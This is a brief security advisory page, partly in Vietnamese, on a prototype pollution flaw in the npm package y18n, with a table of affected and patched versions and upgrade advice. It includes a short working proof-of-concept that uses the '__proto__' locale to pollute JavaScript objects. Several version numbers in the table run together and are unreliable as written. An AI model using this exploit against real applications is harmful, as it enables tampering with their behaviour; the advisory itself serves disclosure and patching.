| Gói / sản phẩm | Phiên bản bị ảnh hưởng | Phiên bản đã vá |
|---|---|---|
| graalvm | = 19.3.5= 20.3.1.2= 21.0.0.2 | |
| sinec infrastructure network services | < 1.0.1.1 | 1.0.1.1 |
| y18n | = 4.0.0≥ 5.0.0, < 5.0.5< 3.2.2 | 5.0.53.2.2 |
| y18n | ≥ 4.0.0, < 4.0.1≥ 5.0.0, < 5.0.5< 3.2.2 | 4.0.15.0.53.2.2 |
The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.
const y18n = require('y18n')();
y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});
console.log(polluted); // true
Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
Bạn đang dùng một trong các sản phẩm này? Quét site để biết có đang lộ phiên bản có lỗ hổng không.
Quét site miễn phí